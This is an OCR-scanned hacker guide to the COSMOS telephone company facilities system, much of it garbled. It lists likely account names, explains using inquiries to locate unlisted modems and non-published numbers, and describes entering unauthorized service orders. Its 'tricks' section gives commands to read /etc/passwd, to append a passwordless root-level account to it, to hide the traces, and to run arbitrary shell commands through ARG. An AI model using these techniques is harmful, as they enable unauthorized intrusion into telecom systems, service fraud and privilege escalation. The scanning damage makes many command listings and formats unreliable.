lucky enough to receive a '’WC#’ prompt you have access to the 


like 


COSMOS usernames are usually issued as two letters corresponding to 


X: LAO1 
sing the abov xamp] 
LA" accounts, possibly "LAO1" through "LA15" or hi 


=CqQhHe 


hatever center will be using that account, and two numbers. 


gher. 


AOQ1" there will most probably be numerous 


This is true 


for most COSMOS usernames. More often than not, all accounts used by the 


same center will have the same password as well. Some common usernames 
and their owners are: 
ROOT System Manager 
SYS System Manager 
ML Loop Assignment 
LA Loop Assignment 
DN Main Distributing Frame 
IN Repair Service 
RS Repair Service 
CE LNAC 
LK Account to execute INQuiries only 
JA Mizar 
WLI Work Load Indicator 
Usernames may vary from BOC to BOC, but these are fairly standard. 
COSMOS TRANSACTION COMMANDS 
COSMOS commands are thr letter acronyms. I will explain in 
depth the commands I have found most useful, and then list 
the remainder. Remember, do not attempt to learn the formats for COSMOS 


transactions online. You will probably not figure out correct inputs, 


will most likely cause problems for the system manager and yourself. 
Commands are entered in a specific ways. The command desired is 
entered at the WC% prompt. A second string of data is entered at 
the next line which designates the type of transaction desired. 

This line is prefixed with on of the following four letters: 


H Header Lin 
I - In Line 
O —- Out Line 
R —- Remark Line 


The most commonly used line is the H line. It is a required input in 


almost all COSMOS transactions. From the second li 
prompt with an underscore "_" as the system prompt, 
know that it is waiting for input. When all needed 
the command is executed by typing a "." at the begi 
If you wish to process a command, but stay in comma 
process further commands after the one you are curr 


ne on 


data 
nning 


, COSMOS will 


to let the user 


has been entered, 
of a new line. 


nd level in order to 


ntly 


ntering has 


finished, a ";" can be entered at the beginning of a new line. 


To cancel the transaction you are entering, a "Q" s 


hould 


be entered at 


and 


the beginning of a new line. To interrupt output, the break character 
is "*C". When entering criteria, you may enter all like data (all H-line, all 
I-line, etc...) on one line using a "/" between input prefixes: 


EX: H TIN 222-0000,222-9999/RMKT SWBT?/US 1FB 

is the same as entering: 

H IN 222-0000, 222-9999 

_H RMKT SWBT? 

_H US 1FB 

One of the most commonly used commands is INQ (Comp 


lete 


Circuit Inquiry). There is also a short form of INO called 


ISH. This command requires only the use of H lines 


- Mu 


ltiple H lines 


can be entered to narrow a search or to print multiple reports. 
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Valid H line facilities used are: 


BL Bridge Lifter 
CON Concentrator 
CP Cable Pair 
CKID Circuit ID 
MR Message Register 
OE Office Equipment Number 
PL Private Line Circuit Number 
TK Trunk Cable and Pair Number 
TN Telephone Number 
TP Tie Pair 
XN "X" Number 
TRE Transmission Equipment 
TER Terminal Number 
GP Group Number 
ORD Work Order 
EX: To print information on telephone number 222-2222 


WC% INQ 
H IN 222-2222 


EX: To print information on cable pair 11-1111 
WwC% INQ 
H CP 11-1111 


INQ will print a full report whatever circuit you examine, while ISH 
will print a shorter, easier to read report. Below is an actual ISH 
done on a Telenet node. 

CA% ISH 

H TN 225-8004 


TN 225-8004 

ST AU DA 

006-012-200 

ST WK DA 

LCC TE2 

LOC WF12003 

TER O0-0081-0001 

ST WK 

RMKG GTE.TELENET 

CP 95-0701 

ST WK DAT 

LOC WF12009 

LP 6105-0910 

ST WK DAT 

LOC F12003 

Loc F42001 
FROM FAC OE 006-012-200 TO FAC TP 6206-0107 

TP 6206-0107 
ST WK DAT 

LOC F22029 

LOC F42002 

HUNT SEQUENCE FOR TN 225-8004 

TER 0001-0040 

** TSH COMPLETED 02-29-99 12:00 

CAS 

When you pull an inquiry on a number that you are interested in, you will 

be given its cable pair, its order number, any numbers that connect to 

it through a hunt sequence, and you will see any remarks entered about the 

number. This information can prove to be very valuable. For instance: 

You suspect that a company has a modem online, yet you don’t want to waste 

time sequentially dialing thousands of numbers. You can simply enter 

an ISH on the number to get its cable pair, then begin pulling ISH 

reports on cable pairs close to the main one. Then you need only dial 

twenty or so numbers that are in the same area as the main number, and 

you will find the computer. 

Another extremely valuable command is SIR (Sorting Inquiry by Range). 

With SIR, you can print the circuit information on all lines that match 

specified criteria within a specified range of numbers. This command 


06-03-83 HT GP 0-0081 BIN 225-8004 TYP 


ial 


E 


O 


{Ea 


03-04-86 CS 1FBH US 1BH FEA TNNL 


E 


al 


01-24-86 RZ 13 


al 


01-24-86 


I 


al 


01-24-86 
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requires only H line input, but numerous lines may be entered in order to 
narrow down the search. You may also use the wildcard character ("?") to 
encompass a larger range when doing a SIR. There are many applications 
for SIR, but I will only show examples on a few I have found to be 

most useful. 
Many times entries have special remarks entered about the circuit. These 
are usually entered as RMKT (Remarks on Telephone Number), but they may be 
entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable 
Pair), depending upon what the person entering felt like typing. 

Most of the time the remarks really don’t correspond like they should. 
Telephone companies are pretty thorough about remarking on a line that 
they own and they will usually use the RMKT prefix. 

EX: To find all telephone company (Southwestern Bell) lines in prefix 222 
WC%S SIR 

H IN 222-0000, 222-9999 

_H RMKT SWBT? 


The "2" after SWBT acts as a wildcard. Typing SWB? would perform the same 
search. 

You may also want to search by STT (Telephone number status). Some types of 
STT are: 


AU Auxiliary 
NP Non-published 
OF Official (telco owned) 


TS Test 
Another way to distinguish types of number is by CS (Customer Class of 
Service). CS values tend to vary from BOC to BOC, but business lines 
will usually look like "1FB", or at least contain a "B". Residences 
will usually look like "1FR." Sometimes telco lines are listed as "10F", 
but may also be entered as "1FB". On lines in a hunt group, the CS will 


be appended with the letter "H", as "1FBH". 


Let’s say a company owns a block on an exchange (333) running from 1000 to 
3500. You want to find all possible computer numbers in that area. Chances 
are good that they are not listed. 

EX: 

WC%S SIR 

H TN 333-1000, 333-3500 

_H STT NP 

_H CS 1FB 


The above would list all non-published business numbers from 333-1000 

to 333-3500. 

To find all numbers that are translated 800 numbers in the same prefix range 
as above, you can do the following: 


EX: 

WC%S SIR 

H TN 333-1000, 333-3500 

_H PL ?800? 

This will prints reports on all private lines registered as 800 numbers. 


There is also a shorter version of SIR, LIN (List Telephone Numbers), anda 
more detailed version, GFR (General Facility Report), but I have found 

SIR to be the better of the three to use for my purposes. 

In order to change line attributes, or to create new lines you will need 

to use two commands SOE (Service Order Entry), and RCP (Recent Change 
Packager). These two commands are pretty detailed in what they can do, 


so I will just cover a few of their options. 


SOE will allow you to assign a new circuit, and specify the desired telephon 
number, custom calling features, billing telephone number, etc. 

SOE requires both "H" and "I" lines of input. The best way to enter 

a new service order is to have COSMOS pick your new telephone number and 
assign the needed office equipment number. If you want to pick your own 
telephone number, the number you pick must have a status (STO) of SP, LI, RS, 
or PD (with a disconnect date before the due date on your new service order). 
This is so that you do not try to assign a number that is currently working 
to your new service order. You can check this by doing an ISH on all the 
variations of numbers you desire, and checking the STO. You can also get a 
list of available numbers in a given prefix using the NAI command. You 
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should also do a SIR of recent entries, to try to find the proper format of 
order numbers, so that you do not reuse one, or make one up that is formatted 
incorrectly. Another method to make sure that you have the correct formatting 
of order numbers is to call the phone company and request the installation of 
a line in the area you are working in. They will tell you your service order 
number for reference. Later, you can merely cancel the order. You will also 
have to find a valid cable pair, so do an ISH on whatever number written in 
your junction box that is not working, and then make sure there is no pending 
connect orders entered on it. 

To enter a service order for a new connection, having COSMOS pick an available 
telephone number and assign proper office equipment numbers, you would do 

the following: 


EX: 

WC%S SOE 

H ORD S0123456/0T NC/DD DD-MM-YY (Use valid Day, Month, Year for Due Date) 
_I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY (Use valid cable pair for XX-YYYY) 


You would now need to enter RCP and make a correctly formatted recent change 
report for the order you entered so RCMAC can pick up the order and directly 
nter it into the switch. What RCP does is take your order and change it into 
ctual switch programming, using templates that are stored in directories 
orresponding to what type of switching equipment is used for that WC. 

EX: ess5Sa) 

X: To create a recent change package for the order entered above 

WC%S RCP 

H ORD SO0123455 


H.~aQo oO 


Using SOE you can specify custom calling features, you can specify billing 
telephone numbers, you can establish service as coin, and several other 
options by adding "I" line information corresponding to that particular 
option. 


_I CCF XXXXXX (XXXXXX is valid custom calling features) 

_I BIN NNX-XXXX (NNX-XXXX is valid billing TN) 

ee ein He: 
To get a list of spare (available) telephone numbers in a given prefix, you 
can use the NAI (Telephone Number Assignment Inquiry) command. You only need 
enter H line criteria. In addition to searching by prefix (NNX), you can 


search by switch type (TYP), or rate zone (RTZ). 

EX: To select one spare telephone number in 555 and make it reserved status 
WC%S NAI 

H TT X/NNX 555/STT RS 


You may also have NAI print out several available numbers, however, you cannot 
change the status unless you are printing one listing. 


EX: 
WC%S NAIL 
H TT X/NNX 555/LC XX (Where XX is a number between 1 and 25) 


get a listing of all prefixes that exist in the Wire Center you are 
logged in under, you can use the command DDS (Display DS Table). This 
command will list the ranges that exist for a given input. 
To list all telephone numbers in a given WC: 


WC% DDS 
H TN ? 


To list all cable pair ranges: 


WC% DDS 
He @Pe %? 


To change from one Wire Center to another, you use the command WCC (Wire 


Center Change). This is a very straight forward command. 
EX: 

WC%S WCC NW 

NWS 


To allow for redirection in your COSMOS commands, you must execute the 
DIO command. This command is rather important for manipulating commands 
to work for you. 

EX: 
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WC%S DIO 

To see what transactions other people logged in are running, you can use the 
command TSNAP (on certain generics) 

EX: 
WC%S TSNAP 
There are about one hundred other COSMOS commands that are all defined at the 
end of this file. I cannot go into detail on all of them but I will list them 
and their meanings. 


COSMOS TRICKS 

Even if you don’t have full COSNIX access, you can basically execute 

any command or read any file that exists in the system. Using the INQ 
(or ISH) command and redirection, you can open and display any file. 

EX: To display the password file 

WC%S INQ </ETC/PASSWD 

This will display the file, however, since this is a flaw in the command, 
it thinks the file is to be input for INQ, and each line will be preceded 
with "ILLEGAL LINE TYPE", but this can be ignored. 

Other files to look at: 


/USR/FACS/WCFILE List of all Wire Centers 
/ETC/MATRIX.P Permission Matrix (Who can execute what commands) 
You may or may not want to try the following. There is a high probability 


that you will be noticed on the system. If your local COSMOS ports are 
usually left logged in, don’t bother doing this. However, if your COSMOS 
ports are always logged out, and you almost never get in, and you happen 
to stumble upon one left logged for the first time in months, it might be 
worth a try. 

There are a few ways to make a new account on COSMOS; however, you need to 
be able to write to the password file. Some systems allow this, but most do 
not. 


he easiest way involves using the echo command and redirection. 


4 
1 


WC%S echo "EBO1::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so" >>/etc/passwd 
This will add user EBO1 to the end of the password file. 

If you do not have access to echo you can do the same thing using the TED 
command (Text Editor). 

WC%S TED >>/etc/passwd 

S.O. NO.= SO0123456 

IS THIS A NEW S.O. (Y on NO) Y 

ld 

a 

EBO1::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so 

“‘C 

lp 

WwW 

Fg 

After executing the above, you will need to clean up the /etc/passwd 

file to remove the Service Order information put in there by TED. You will 
also need to remove the service order you created from the /usr/so/WC 
directory. 

If you cannot find a way to get shell access, you can still execute 

any COSNIX command you desire again using TED, MSK (Output a Transaction 
Mask), and ARG (Assemble and Run a Given Master File). 

EX: 

WC%S TED 

S.O. NO.= SO0123456 

IS THIS A NEW S.O. (Y or NO) Y 

12 

ld 

a 


S* 


WC% MSK >/usr/so/newcmd 
S$0123456 
WC% ARG 
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newcemd ls /etc 

To execute the command, you need to do ARG, then the name of the 
file (which I called newcmd), then the COSNIX command you wish to 
execute. 

If you can use echo this can be done much easier. 

EX: 

WC% echo '$*’ >/usr/so/newcmd 

WC% echo ‘run!’ >>/usr/so/newcmd 

Then you can run your command normally with ARG. 

WC%S ARG 

newcemd cd 

IF you do not have access to echo, create a newcmd file and you can use it 


that way. 
WC%S ARG 


newcemd echo EBO1::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd 


COSMOS COMMAND LISTING 

ACE Establish an Assignment Change Ticket 
AIT ANALIT Initialization of Tables 

ARG Assemble and Run a Given Master File 
AUD Assignment List Audit 

BAI Bridge Lifter Assignment Inquiry 

BYF Display the Bypass File 


BYP Change the Contents of the Bypass File 

CAY Create an Assembly 

CCA Change Customer Attributes 

CCT Initialize and Update the Contractor-Transducer File 

CDA Change Distribution Attributes 

CDD Change Due Date 

CDR Cut Thru DIP Report 

CFA Change Facility Attributes 

CFP Print the Class of Service/Features for an Electromechanical Entity 
CFU Change Facility Usage 


CIE Company Establish Company Initiated Change 
CLI COSMOS Processed ALIT Reports 

CPI COSMOS-PREMIS Interface 

CPM COSMOS Performance Monitor 

CTC Complete a Cable Transfer or Complete a Cable Throw 
CTE Cable Throw Order Establishment 

CTF Display the Contacter-Transducer File 

CTL Cable Throw with Line Equipment Assignment 
CTM Cable Throw Modification 

CTP Print Cable Transfer Frame Work 

CTR Cable Throw Replacement 

CTS Cable Throw Summary 

CTW Withdraw a Cable Transfer or a Cable Throw 
CUP Common Update Processor 

CXC Complex Service Order Input Checker 

CXM Centrex Table Management 

CXT Complex Order Inquiry for NAC Review 

DAY Delete an Assembly 

DBL Data Base Load 

DCN List Disconnected and Changed Numbers 

DDS Display the DS Table 

DIR Standard DIP Report 

DPN DIP Purge Number 

DPR DIP Report and Removal 

DOR Design Quota System Report 

DOS Design Quota System 

DTE Print Current Date 

EDZ Facility Emergency Assignment List 

A Entity Load Analysis 


ESP Print Entire Summary Table 
FDY Set Fiscal Day for LAC 

FLR Frame Layout Report 

FOR Frame Order Report 


FOS Frame Operations Summary 
FTA Frame Transfer Analysis 
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oe) 


Frame Transfer Completion 


Frame Transfer Establishment 


E 


[lL Frame Transfer LETs 


Frame Transfer Reprint 


ae) 


[ Frame Transfer Withdrawal 
FWM Frame Work Management 
R General Facility Report 


GLA Generate Lists for Assignment 
HBS Hunt Group Blocks of Spares 


R Hunt Group Report 


HGS Hunt Group Summary 
HIS Hunting ISH 


R Input a Jeopardy Reason 


IMU Input Measured CCS Usage Data 
INQ Complete Circuit Inquiry 
ISF Inquire on a Single Facility 


H Complete Circuit Inquiry Short 


JAM Jumper Activity Management 


H Jumper Placement History 
R Killer Pair Report 
M Create a Transaction Mask 


> 


Gl 


ae 


Gh ww 


ee aaa ghee sy ae Go 
4 


> 


Orders in Jeopardy 

Open-of-—Day Report 

Outside Plant Cable Usage 

Work Packages 

Position Establishment for Parties 
Party Line Fill Report 


AI Line Equipment Assignment Inquiry 
i1BP Load Balance Parameters 
iCD IST Cable Summary, LIT Demand Test 
iCP ist Cable Pairs 
EE NAC Related Line Equipment Transfer Order Establishment 
LEW ine Equipment Transfer Withdrawal 
FC oad Factor Calculation 
FR ine Failure Report 
GN List Hunt Groups 
LIN Transmit ALIT Data to COSMOS 
OE ist Originating Line Equipment 
SE ine and Station Transfer Order Establishment 
LSW ine and Station transfer Withdrawal 
TN List Telephone Numbers 
MAL Manual Assignment List 
MAP Manual Assignment Parameters 
MAQ Manual Assignment File Inquiry 
MAY Modify an Assembly 
MCE Establish a Maintenance Change Ticket 
MCH Manually Change Hunt 
MCL Maintenance Change List 
MCR Establish a Maintenance Change Repair 
MCW Maintenance Change Ticket Withdrawal 
MDC Manually Disconnect a Working Circuit 
MEC Manually Establish a Circuit 
MMC Manually Modify a Circuit 
MOC MOE Order Completion 
MOE Mass OE Transfers 
MOF Mass OE Frame Transfer Listings 
MOW MOE Order Withdrawal 
MPK Modify Work Package 
MSK Output a Transaction Mask 
MTR Manually Test a Response 
AI Telephone Number Assignment Inquiry 
OL NAC Service Order Listing 
SD Number Summary Display 
IJ 
PN 
PU 
K 
P 
R 
P 


Periodic Purging of Remarks 
X Question an Execution 
E Queue 
1 Relay Assignment List 
P Relay Assignment Parameters 
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Number Lists and Related TIN/O 


9 


Gl 


Equipment 


Exchange Class of Service Study 


Numbers 


Retention Factor and Print Threshold 


Numbers 


RAS Release Sequenc 
RBS Print TBS Relays Assignment Record 
RCP Recent Change Packager 
RCR Recent Change Report 
RCS Recent Change Summary 
RED Recent Change Message Text Editor 
REL Release Non-Intercepted Numbers by Release Date 
REM Remove Frame Locations 
RET Retermination of Frame Locations 
REX Reexecute a Service Order 
RJR Remove Jeopardy Reason Codes 
RMP Recent Change Punctuation Table 
RNA Release Telephone Numbers for Assignment 
ROE Reservation Order Establishment 
ROI Reservation Order Inquiry 
ROW Reservation Order Withdrawal 
RTH Report Transaction to Count Spare and DIPed Line 
RTS Relay and Telephone Number Status Report 
RUP Request Unsolicited Processing 
SAI Summary of Action Items 
SCA Service Order Completion-Automatic 
SCF Simple Completion for MDF 
SCI Spare Cable Pair Inquiry 
SCM Standard Completion by MDF 
SCP Service Order Completion by LAC 
SCR Standard Completion by RCMAC 
SEL Selecting Lines for an 
SET Statistics on Equipment and Telephon 
SGH Supply Relays for Groups of 5XB Hunts 
SIR Sorting Inquiry by Range 
SLC Subscriber Line Counts for Custom Calling Features 
SOC Service Order Cancel 
SOE Service Order Establishment 
SOF Service Order Fix 
SOH Service Order Withheld 
SOI Service Order Assignment Inquiry 
SOL Service Order Listing 
SOM Modify a Pending Service Order 
SOW Service Order Withdrawal 
STN Summarize Telephone Numbers 
SVL Service Observing Loops 
TAI Tie Pair Assignment Inquiry 
A est Alignment of Frame Terminal 
ED ext Editor 
E Display or Change Band Filter File, 
FC ransfer Frame Changes 
TIG Dial Transfer Input Generator 
TLC Translate LANAVAR/CPS 
NS lephone Number Swap 
ToC Transfer Order Completion 
OE Transfer Order Establishment 
TOF Mass OE Transfer Order Frame Listings 
TOI Dial Transfer Order Inquiry 
OL ransfer Order Lists 
OO ransfer Order Omissions 
OW ransfer Order Withdrawal 
PU ie Pair Usage Report 
TRC Transfer Order Recent Change Report 
RI ransmission Equipment Assignment Inquiry 
RW Total Reservation Order Withdrawal 
TSL Line Equipment Summary Report 
SN Traffic Statistics on Telephon 
TSW Total Service Order Withdrawal 
TTY Get TTY Name 
TXC Text Checker 
XM ransfer Centrex Management 
UDP Update DIP Parameters 
UES Update the Entity Summary Table 
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UFO Unprinted Frame Orders 

UPC Update CCS vs. Class of Service Table 
USL List USOC (US) File Data 

UTC Update Table for Concentrator Redesign 
WCC Change Wire Center 


WCT Worksheet for Cable Throw Orders 

WFL Working Frame Location 

WOI Work Order Inquiry 

WOL Work Order Listing 

WPT Work Package Table 

WSL Work Status List 

WUL Work Unit Report for Subscriber Line Testing and Installation Assignment 


COSMOS ABBREVIATIONS AND FORMATS 


The following will be given as follows: 
Prefix and Meaning 

Format 

Code Value and Meaning 


AC Assembly category 
AC XXXX 
PERM=Permanent Facility Assemblies 
TEMP=Temporary Facility Assemblies 
AC Assembly Code 
AC XXX 
XXX=1-999 
ADSR Administration of Designed Services Review 
ADSR X 
Y=Yes, TIRKS Circuit 
N=No, COSMOS Circuit 
AGM Normal Aging Months 
AGM XX 
XX=Number of Months 
AGT Accelerated Aging Type 
AGT XXX 
BUS=Business 
RES=Residential 
AI Assigner’s Initials 
AI XXX 
XXX=3 Alphanumeric Characters 
AO Allocation Order 
AO XX 
XX=Two Numeric Characters 
AR Advance Relay 
AR XYY-Z2Z 
X=Marker Group 
YY=Number Group from Frame 
ZZZ=Relay Number 
ATN Assigner’s Telephone Number 
ATN XXX-XXXX 
XXX-XXXX=Assigners IN 


BL Bridge Lifter 

BL XX...XX 

XX...XX=Maximum of 17 Alphanumeric Characters 
BLS Bridge Lifter Status 

BLS X 

Y=Yes 

N=No 
BND Band Number 

BND X 

X=0-3 


BIN Billing Telephone Number 

BIN XXX-XXXX 

XXX-XXXX=Billing Telephone Number 
CA Cable Number 

CA XX...XX 

XX...XX=Maximum of 10 Alphanumeric Characters 
CAT Centrex Access Treatment 

CAT XX 
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XX=Maximum of 2 Numeric Characters 
CC Call Count 

CC XX 

XX=Maximum of 2 Numeric Characters 
CCF Custom Calling Features 

CCF XXXXXX 

XXXXXX=3 to 6 Alphanumeric Characters 
CCS Hundred Call Seconds 

CCS XXXxX 

XXXX=3 or 4 Numeric Characters 
CEU CCS Estimated Usage 

CEU XXXX 

XXXX=3 or 4 Numeric Characters 
CG Control Group Number 

CG X 

X=0-9 
CKID Circuit Identification 


CKID XX...XX 

XX..XX=Maximum of 61 Alphanumeric Characters 
CKL Circuit Location 

CKL XXXX 

XXXX=Maximum of 4 Alphanumeric Characters 
CLC Common Language Code for an Entity 

CLC XX...XX 

XX...XX=Maximum of 11 Alphanumeric Characters 
CLCI Common Language Circuit Identification 

CLCI XX...XX 

XX...XX=Maximum of 61 Alphanumeric Characters 
CLEI Common Language Equipment Identifier 

CLEI XX...XX 

XX...XX=Maximum of 10 Alphanumeric Characters 
CLF Creating DIPs Upper Bound Load Factor 

LF XX 

X=1-10 
LL reating DIPs Lower Bound Load Factor 

LF X 

=1-9 


CI in Serial Number Format 
LS XX...XX 
X..XX=Maximum of 61 Alphanumeric Characters 
CI Telephone Number Format 
LT XX...XX 
XX...XX=Maximum of 61 Alphanumeric Characters 
CMF Capacity Main Station Fill 
CMF XXXXXX 
XXXXXX=Maximum of 6 Numeric Characters 
CMU CCS Measured Usage 
CMU XXXX 
XXXX=3 or 4 Numeric Characters 
COM Complement Size 
COM XXXX 
XXXX=1-9999 
CON Concentrator 
CON XX-YY 
XX=Maximum of 2 Alphanumeric Characters 
YY=Maximum of 2 Numeric Characters 
CP Cable and Pair Number 
CP XX...XX-YZ2Z 
XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters 
YZZZ=Cable Pair ID 
Y=Alphanumeric 
ZZ2Z=Numeric 
CPU CCS Capacity Usage 
CPU XXXX 
XXXX=3 or 4 Numeric Characters 
CRG CREG Tag 
CRG XXX 
XXX=YES or NO 


Q 
n 
AAIXAAKAAK 
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CS 


CTID 


CTT 


CTX 


DC 


DD 


DID 


DIP 


DNY 


DPA 


DST 


DT 


Customer Class of Service 

CS XXXXXX 

XXXXXX=Maximum of 6 Alphanumeric Characters 
Circuit Termination Identification 

CTID XX...XX 

XX...XX=Maximum of 61 Alphanumeric Characters 
Cut Through Tag 

CTT XXX 

XXX=YES or NO 

Centrex Group Number 

CTX XXXX 

XXXX=Maximum of 4 numeric Characters 

Dial Code 

DC X 

X=1 Alpha Characters 

Due Date 

DD MM-DD-YY 

MM=Month 

DD=Day 

YY=Year 

Direct Inward Dialing 

DID XXXX 

XXXX=Maximum of 4 Numeric Characters 

DIP Creation Option 

DIP X 

Y=Yes 

N=No 

Denial of Service for Non-payments 

DNY X 

I=Incoming 

O=Outgoing 

B=Both 

Different Premises Address 

DPA XXX 

XXX=Maximum of 3 Alphanumeric Characters 
Department Name 
DPT XXX 
XXX=Maximum of 3 Alphanumeric Characters 
Destination of Order Response 

DST XXXX 

XXXX=Maximum of 4 Alphanumeric Characters 
Due Time 

DT XX 

XX=AM, PM, or 0-9 


ESS Entity and Control Group Number 
EC YZ 
Y=Entity Number 

Z=Control Group Identifier 


ECS 


Equipment Class of Service 

ECS XXXXXX 

XXXXXX=Maximum of 6 Alphanumeric Characters 
Enter Date 


D MM-DD-YY 
M=Month 
D=Day 
Y=Year 


ntity 


Z 


xX 
S;,. -B;~ 1,> Sor OQ 


ENT 


tf 
ntity Number 
xX 


4 
fo) 

| 
Oo 


ntity Number 


Z 
H 
Pad 


0=9 


1M AK eX Bele Oe Bl Bl 
ll 


icrror Handling Option 
XX 
E=Continue Processing and Establish Valid Circuits 


Qw 
(oe) 
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EQF 


Wed Apr 26 09:43: 


CW=Continue Processing 


38 2017 


and Withdraw 
Establish Valid Circuits 


13 


Established Circuits 


SE=Stop Processing and 
SW=Stop Processing and 


Equipment Features 
EQF WXYZ 

W=R (Rotary) or T 
Y=S (Sleeve) X (Range 
X=E (Essential) or N 
Z=G (Ground Start) or L 


ETC 


Frame Equivalence 
EQV FXX 
F=The Letter 


wR 


ETC XXXX 


EXD 


ECS Crossloading Option 


FAC 


FAC 


ie 


FDD 


FILT 


FR 


FT 


FW 


GP 


GSO 


EXD XXX 
XXX=YES or NO 


FAC XX 

TN=Telephone Number 
OE=Line Equipment 
Circuit Confiruration 
FAC XXX 
FAC TN-NNX 
FAC CP-XX...X 
FAC SE-YY...Y¥ 
FAC PL-2ZZ...2 
XXX=Any Facility Prefix 


Withdraw 


(Touchtone) 
Extension) 
(Non-essential) 


(Loop Start) 


XX=Two Alphanumeric Characters 
Estimated Trunk CCS Value 


Type of Segment List Being Audited 


NNX=Three Alphanumeric Characters 


or N 


Established Circuits 


XXXX=Maximum of 4 Alphanumeric Characters 


(Non-sleeve or Non-range 


XX...XX=Maximum of 10 Alphanumeric 
YY...YY=Maximum of 52 Alphanumeric 
ZZ...Z2Z2=Maximum of 61 Alphanumeric 


From Cabl 
FC XX...X 


e 
Xx 


XX...XX=Maximum of 10 Alphanumeric 


Frame Due 
FDD MM-DD 
MM=Month 
DD=Day 
Y 
Cc 
F 


Y=Year 
ustomer 
EA XXXX 
(Same as 
Filter 
FILT XXX 
XXX=Y, YE 
Frame Ide 
FR FXX 
F=The 
XX=Two 
Frame Tim 
FT XX 
XX=01-24 
MDF Outpu 
FW X 
Y=Frame V 
N=Frame V 
MLHG Grou 
GP Y-XXXX 
Y=Alphanu 


let 


Ground St 
GSO X 


1=Assigned to any OE in the 
Levels 


2=Assigne 
3=Only As 


Date 
=¥Y 


Feature 


EQF) 

S, N, or NO 
ntification 
wR 


ter 


S 


t Suppressed 


ork Yes 
ork No 
p Number 


Alphanumeric Characters 


meric Control Group 
XXXX=Numeric Group Number 


art Option 


Entity 


d to Even 
signed to OE 


Characters 
Characters 
Characters 


Characters 


Specified as Ground Start 


Extension) 
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HRS 


HTG 


HTX 


INIT 


ITM 


JL 


JR 


LC 


Hunt Count 
HC XXXX 
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XXXX=Maximum of 4 Numeric Characters 


Hunt-from Telephone Number 
HF XXX-XXXX 
XXX-XXXX=Telephone Number 


HLC XXXX 
XXXX=1-9999 


HR XX 


Held Order Reason Code 


CE=Equipment Shortage 


C= 


Lack of Facility 
CL=Plant Load 


Highest Lead Factor Group Count 


CO=General Company Reasons 


C1-C5-Additional 


SA=Subscriber Access 
SL=Subscriber Requested Later Dat 
SO=General Subscriber Reasons 

SR=Subscriber Not Ready 

S1-S5=Additional General Subscriber Reasons 


1 Company Reasons 


Hours Prefix 


HRS XX 

XX=01-24 

Hunt-to Telephone Number 
HT XXX-XXXX 
XXX-XXXX=Telephone Number 


HTG Y-XXXX 


HTX XXX-YXX 
Y=A 
X=Numeric 
Al 


INIT 
(No 


Data 


Hunt-to Group Number 


lphanumeric 


Y=Alphanumeric Control Group 
XXXX=Numeric Group Number 

Hunt-to X Number 
HTX XXX-YYXX of 


llocation Table Initalization 


Entry) 


Cable Pair Item Number 


ITM XX 


XX=Two Numeric Characters 
Jumper Length 


JL XXX 


XXX=Maximum of 3 Numeric Characters 


Jeopardy Reason 


JR XX 


Al=Assignment 
A2=Assignment 
A3=Assignment 


A4-A9=Other 


Error on 
Error on 
Error on 
Assignment 


C1=No SSWO for Circuit 
C2-C9=Local 

ER1-E9=No ESS Translatio 
IB=No Installation Go-a 
IC=No Installation Go-a 
ID=No Installation Go-a 
IR=No Installation Go-a 
IS-No Installation Go-a 


T1-14=Local 
RB=Business 
RC=Coin RSB 
RD=Data RSB 


Output Line 
LC XXXX 


Codes foir 
RSB 


RR=Residence RSB 
RS=Special RSB 
R1-R4=Local Use for RSB 


Count 


9) 


THOQ 
Z Fl 


Error 
Design Group 


Code for Circuit Design Group 


ns 
head 
head 
head 


Business 

Coin 

Data 

head for Residence 

head for Special 

No Installation Go-ahead 


for 
for 
for 
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XXXX=0-9999 
sine Count 


LC 


LCC 


LC XXX 

XXX=0-999 

Pending Service Order Count 
LC 

(No Data Entry) 

Line Class Code 


LCC XXX 
XXX Maximum of 3 Alphanumeric Characters 
coading Division 


iDN 


LD XX 
XX=Two Numeric Characters 
iisted Directory Number 


LDN XXX-XXXX 
XXX-XXXX=Telephone Number 
.xoad Factor 


1IM 


LF XX 
XX=1-10 
ess Than the Specified Number of Pairs 


LIM 


LIM XX 
XX=0-50 


1IM 


High Limit on Number of Specified Status Pairs 
LIM XX 
XX=0-50 


iLC 


LIM XX 
LIM=1-10 
.ow Load Group Count 


LOC 


LLC XXXX 
XXXX=0-9999 
socation 


LOC FXXYYY 
F=The Letter "F" 
XX=Alphanumeric 
YYY=001-999 
soop Range 


LP XXX; XXX 
XXX; XXX=Six Numeric Characters 


LTI 


ist New Pending Cable Transfers 
LS XXX 
XXX=NEW 

coop Termination Identifier 


LTI XXX 
XXX=Three Alphanumeric Characters 


MASK Office Equipment Mask 


MAT 


MAX 


MBL 


MASK OE ID 

ID=XXX-XXX-XXX =1ESS 
ID=XXX-XXXX =2ESS 
ID=XXX-XXXX =3ESS 
ID=XXXX-XXX-XX =5ESS 
ID=XXXX-XX-XX =5ESS 
ID=XXXX-X-XXXX =RSS 
ID=XXXX-XXX-XX =1XB 
ID=XXXX-XXXX-XX 1XB 
ID=XXX-XX-XX =5XB 
ID=XXXX-XXX =SXS 
ID=XXX-X-XX-X =DMS-10 
ID=XXX-X-XX—-XX —-DMS-100 


X=Alphanumeric 

Manual Assistance Tag 
MAT XXX 

XXX=YES or NO 


MAX XXX 
XXX=Maximum of 3 Numeric Characters 


Mini-bridge Lifter Tag 
MBL XX 


in a Complement 


ow Limit on Number of Spare Line Equipment in Vertical Files 


Maximum Percentage Value of Entity Fill or Maximum CCS Value 
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MC 


MF 


MF 


MG 


MPN 


MR 


MRO 


MT 
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Y=MBL Work 
N=CP Can’t 
EQ=CP has 
Marker Cla 
MC XX 
XX=Two Alp 
Recent Cha 
MF XXXX 


EW=RX: LIN 


ing on CP 
Support MBL 

MBL Capabilities 

ss of Service 


hanumeric Characters 
nge Message Format 


1sMmeEeSSages 


UT=RC: LIN 


,;OUT:messages 


HG=RC: LIN 


ear, 
G 

ar 
G 
_ 
ry 


:CHG:messages 


umper Lis 
F XXX 
EW=Runnin 
J=Dead Ju 
essage Fo 
MF XXX 

ALL=Messag 
ERR=Messag 
Message Fo 
MF XXX 

GVR=Transa 
LVT=Line V 
TLC=Two-li 


N 
O 
Cc 
SUSP=RC:LI 
vr 
N 
D 
Ft 


NE:CHG:messages of suspended servic 
ting for MDF 


g Jumper Listing 
